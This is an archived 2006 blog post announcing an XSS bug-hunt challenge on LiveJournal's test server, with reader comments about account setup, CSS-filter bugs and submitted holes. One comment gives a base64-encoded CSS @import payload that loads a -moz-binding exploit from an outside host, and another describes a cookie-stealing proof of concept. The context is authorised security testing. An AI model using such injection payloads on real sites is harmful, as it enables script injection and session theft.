the XSS security challenge
Anybody bored and want a permanent account? Read on:

We're going to be running an XSS (Cross site scripting / Javascript injection) bug hunt challenge soon here. The biz people like the idea but need to squabble over rules and legal stuff. Unofficially, it'll involve giving out permanent accounts and money (or gift certificates).

So while I can't promise you jack right now in terms of money, I can give out permanent accounts like candy, so I'll announce the first round of the game:

STEP 1: Go to http://www.test.dev.livejournal.org/ . Make an account. Probably need to change it to paid so you can make styles/etc.

STEP 2: Inject some JavaScript. Use S1, S2, CSS, overrides, you name it. It'd probably help if you read the HTML and CSS cleaner code in cvs to look for bugs, but it's not required. If you want, the code is at:

cvs/livejournal/cgi-bin/cleanhtml.pl
cvs/wcmtools/lib/HTMLCleaner.pm
cvs/wcmtools/lib/CSS-Cleaner/lib/CSS/Cleaner.pm

CVS viewers are at http://cvs.danga.com/ and http://cvs.livejournal.org/ .

STEP 3: Email me (brad@danga.com) with subject containing at least "XSS-LJ", and a URL to a minimal test case illustrating your hole. I need to know how you did it, source code, maybe your test account's password, whatever it takes. The more clear it is, the more likely you win and I don't accept somebody else's later but more clear bug report first. After you find a hole, go create a new account for your next hole.

Brad's unofficial rules: I am judge, jury, and sole candy giver, at least until there are official rules. If I give you a permanent account, that doesn't mean you're not eligible for money/gift certificates later. We'll retroactively give that out for the best/hardest-to-fix/most-clever holes after the fact.

NOTE: The code running on the above URLs isn't live on the site yet. We don't care about holes at www.livejournal.com, because they're likely already fixed in the test code. The test code will go live on the site soon-ish. So reproduce (or produce) your bug reports on the test machine.

NOTE 2: The test machine above is a small virtual machine. I might not have given it enough memory. If it sucks, I'll increase it. Bear with me.

(Post a new comment)

	vxjasonxv 2006-01-31 06:36 am UTC (link)
	Free paid accounts? Whoo! Oh wait, isolated database :(. (Reply to this)(Thread)(Expand)

(no subject) - vxjasonxv, 2006-01-31 06:51 am UTC (Expand)

(no subject) - bradfitz, 2006-01-31 06:55 am UTC (Expand)

(no subject) - vxjasonxv, 2006-01-31 06:57 am UTC (Expand)

(no subject) - vxjasonxv, 2006-01-31 06:57 am UTC (Expand)

	anton 2006-01-31 06:43 am UTC (link)
	Can't create an account at there: 'unable to connect' when opening https://www.test.dev.livejournal.org/create.bml (Reply to this)(Thread)(Expand)

(no subject) - anton, 2006-01-31 06:44 am UTC (Expand)

(no subject) - bradfitz, 2006-01-31 06:56 am UTC (Expand)

(no subject) - anton, 2006-01-31 07:03 am UTC (Expand)

(no subject) - anton, 2006-01-31 07:10 am UTC (Expand)

(no subject) - bradfitz, 2006-01-31 07:14 am UTC (Expand)

(no subject) - anton, 2006-01-31 07:50 am UTC (Expand)

(no subject) - bradfitz, 2006-01-31 08:03 am UTC (Expand)

(Deleted post)

(no subject) - njyoder, 2006-01-31 08:35 am UTC (Expand)

(no subject) - anton, 2006-01-31 08:37 am UTC (Expand)

(no subject) - bradfitz, 2006-01-31 08:40 am UTC (Expand)

(no subject) - anton, 2006-01-31 08:51 am UTC (Expand)

(no subject) - anton, 2006-01-31 09:27 am UTC (Expand)

(no subject) - watt__lv, 2006-01-31 11:47 am UTC (Expand)

(no subject) - burr86, 2006-01-31 03:49 pm UTC (Expand)

(no subject) - phoenixdreaming, 2006-02-01 12:18 am UTC (Expand)

(no subject) - njyoder, 2006-01-31 08:41 am UTC (Expand)

(no subject) - anton, 2006-01-31 09:37 am UTC (Expand)

(no subject) - njyoder, 2006-01-31 09:43 am UTC (Expand)

(no subject) - anton, 2006-01-31 08:37 am UTC (Expand)

	andfarm 2006-01-31 06:48 am UTC (link)
	Damn, I found mine (and reported it, natch) back in December. Do I get a cookie? (Reply to this)(Thread)(Expand)

(no subject) - daveman692, 2006-01-31 06:50 am UTC (Expand)

(no subject) - andfarm, 2006-01-31 08:06 am UTC (Expand)

	ashley_y 2006-01-31 07:23 am UTC (link)
	And to think I paid $200 back in June... (Reply to this)(Thread)(Expand)

(no subject) - bradfitz, 2006-01-31 07:24 am UTC (Expand)

	noweb4u 2006-01-31 07:37 am UTC (link)
	check your email :) (Reply to this)(Thread)(Expand)

(no subject) - noweb4u, 2006-01-31 07:38 am UTC (Expand)

(no subject) - bradfitz, 2006-01-31 08:02 am UTC (Expand)

(no subject) - noweb4u, 2006-01-31 08:09 am UTC (Expand)

	Filtering out legitimate CSS? njyoder 2006-01-31 08:28 am UTC (link)
	This gets filtered: <div style="background-image: url('http://www.foo.com/foo.gif')">Test</div> I think it's because of this line: return undef if $v->{value} =~ m!^url! && $v->{value} !~ m!^url[\'\"]?http://!; Maybe I'm missing something, but doesn't that only match url'http://.... and not url('http://... ? You can't use properly formated url('...') properties. (Reply to this)(Thread)(Expand)

Re: Filtering out legitimate CSS? - bradfitz, 2006-01-31 08:43 am UTC (Expand)

Re: Filtering out legitimate CSS? - cramer, 2006-01-31 05:11 pm UTC (Expand)

	automatonic 2006-01-31 09:11 am UTC (link)
	Sent... something? (Reply to this)

	caladri 2006-01-31 09:14 am UTC (link)
	Sent you a Safari-specific one courtesy of documentation and running strings on the WebKit binary. (Reply to this)

	tgies 2006-01-31 09:23 am UTC (link)
	Found 2, but one might not be That Great. Emails sent. (Reply to this)

	fd0man 2006-01-31 10:37 am UTC (link)
	Very cool. I'm not that well versed in Perl, so I didn't understand much of the code, but it's great that people do. So far, everything I've tried didn't do any Bad Things, but, AFAIC, that's a Good Thing. Keep up the great work! (Reply to this)

	jaebird 2006-01-31 01:34 pm UTC (link)
	Haha, my msn security had issues with your security tags (Reply to this)

	avatar 2006-01-31 02:40 pm UTC (link)
	Isn't this a good way of giving the hackers permanent accounts? Or should we consider that okay since they're helping? (Reply to this)(Thread)(Expand)

(no subject) - quadhome, 2006-01-31 02:58 pm UTC (Expand)

(no subject) - avatar, 2006-01-31 03:00 pm UTC (Expand)

(no subject) - tsal, 2006-01-31 03:16 pm UTC (Expand)

(no subject) - avatar, 2006-01-31 03:19 pm UTC (Expand)

(no subject) - wibbble, 2006-01-31 07:03 pm UTC (Expand)

(no subject) - dukesnorre, 2006-01-31 06:08 pm UTC (Expand)

ioannoula 2006-01-31 03:44 pm UTC (link)

oooh well, when u can't pay for a permanent account? is the problem going to be fixed? how can i fix it? i can't log inn from my home pc and read my journal and friends journal as i get cannot find server....what's this story with the cookies?i dont know what they mean? and i already changed password and e-mail i am using for my journal, does this help solving the problem? please let me know, i would love to have an answer from you.thank you (Reply to this)(Thread)(Expand)

Re: slashdot! - crucially, 2006-01-31 04:34 pm UTC (Expand)

	slashdot! immorak 2006-01-31 04:00 pm UTC (link)
	http://it.slashdot.org/article.pl?sid=06/01/31/1324257&threshold=-1 (Reply to this)(Thread)(Expand)

Re: slashdot! - macfrog, 2006-01-31 04:37 pm UTC (Expand)

Re: slashdot! - immorak, 2006-01-31 04:45 pm UTC (Expand)

Re: slashdot! - makomk, 2006-01-31 04:38 pm UTC (Expand)

Re: slashdot! - immorak, 2006-01-31 04:52 pm UTC (Expand)

Re: slashdot! - makomk, 2006-01-31 05:27 pm UTC (Expand)

Re: slashdot! - dukesnorre, 2006-01-31 06:06 pm UTC (Expand)

Re: slashdot! - hopefulnebula, 2006-02-01 05:47 am UTC (Expand)

Re: slashdot! - jamesd, 2006-01-31 07:41 pm UTC (Expand)

Re: slashdot! - tgies, 2006-01-31 07:21 pm UTC (Expand)

	thehumangame 2006-01-31 04:29 pm UTC (link)
	Heh, does the proof-of-concept exploit code I sent you on Jul 10 count? As I recall it embedded javascript into an offsite CSS stylesheet using IE-specific properties, which could steal non-http-only cookies and do anything a downloadable client could do using XMLHttpRequest. (Reply to this)(Thread)(Expand)

(no subject) - njyoder, 2006-01-31 06:29 pm UTC (Expand)

(no subject) - tgies, 2006-01-31 07:23 pm UTC (Expand)

	quadhome 2006-01-31 04:40 pm UTC (link)
	The test machine appears to have gone down from the Slashdot stress. Is there any other way of testing exploit code? I suppose the better follow-up question is, if it's perma-down, can I just e-mail the exploit code? (Reply to this)(Thread)(Expand)

(no subject) - bradfitz, 2006-01-31 06:08 pm UTC (Expand)

(no subject) - quadhome, 2006-01-31 06:15 pm UTC (Expand)

(no subject) - quadhome, 2006-01-31 10:27 pm UTC (Expand)

	azalemeth 2006-01-31 07:53 pm UTC (link)
	I should just say that this is frankly a GREAT idea - and that you've been /.ed (though you know that already). I'll snap my fingers and start typing after supper.... (Reply to this)

Broke CSS.pm? decadence1 2006-01-31 10:09 pm UTC (link)

I was poised to try getting in some JavaScript... chose one of the system styles as a base and went to the test journal I'd just made. No styling was on the journal though; was CSS stripped from poor old Tranquility II? Applying Tranq II to my regular journal over on LJ.com works fine. http://dectest.test.dev.livejournal.org/res/91/stylesheet?1138744104 (winterice theme = no styling) http://dectest.test.dev.livejournal.org/res/91/stylesheet?1138744496 (default = no styling) Going to the above stylesheet URLs specified in the HTML source at the Recent Entries view displays this: /* Cleaned CSS: */ /* Error parsing+validating CSS */ <b>Error running style:</b> Invalid or unexpected property ' * { margin: 0' in style '@media screen, print' at /usr/share/perl5/CSS.pm line 76<br /> Am I missing something really obvious here? :-/ (Reply to this)(Thread)(Expand)

Re: Broke CSS.pm? - mart, 2006-01-31 10:59 pm UTC (Expand)

	legolas 2006-02-01 12:32 am UTC (link)
	Could you grant me priviliges to approve schools on the test machine (legolas also)? I'll be looking for low-hanging fruit mostly, but who knows... (Reply to this)

	panda_cookie 2006-02-01 02:16 am UTC (link)
	Cuteness Attack does not work on the test server: http://pandatest.test.dev.livejournal.org/ (Reply to this)(Thread)(Expand)

(no subject) - panda_cookie, 2006-02-01 02:20 am UTC (Expand)

(no subject) - panda_cookie, 2006-02-01 02:30 am UTC (Expand)

	yukinoomoni 2006-02-01 03:35 am UTC (link)
	Wait a second; so instead of making our already existing accounts permanent, we have to make new ones in order to get this? (Reply to this)(Thread)(Expand)

(no subject) - panda_cookie, 2006-02-01 03:53 am UTC (Expand)

	blackerlotus 2006-02-01 06:48 am UTC (link)
	Found one thing™ and a bug, email sent. (Reply to this)

	panda_cookie 2006-02-01 07:24 am UTC (link)
	Found some bugs. Email sent. Sorry about the Cuteness Attack emails, earlier. :) (Reply to this)

data: uri njyoder 2006-02-01 03:19 pm UTC (link)

This may be another vector for attack, but I couldn't find anything specific for it. The current filter rejects this as not-understood CSS, but it's possible that in the future you may be able to insert this somewhere else and have it work, which necessitates a need for full whitelists. This would have worked if it weren't for the fact that it either doesn't accept @import or it doesn't accept data: in that part of CSS. @import "data:text/css;base64,cCB7IC1tb3otYmluZGluZzogdXJsKCJodHRwOi8vd3d3Lmd1bW1pYmVhcnMubnUvcG9jMi54bWwjZXhwbG9pdCIpIH0K"; (The above is ) (Reply to this)

	noven 2006-02-11 02:42 pm UTC (link)
	XSS is tricky. I've found an easy XSA vulnerability. Would that count? (Reply to this)

---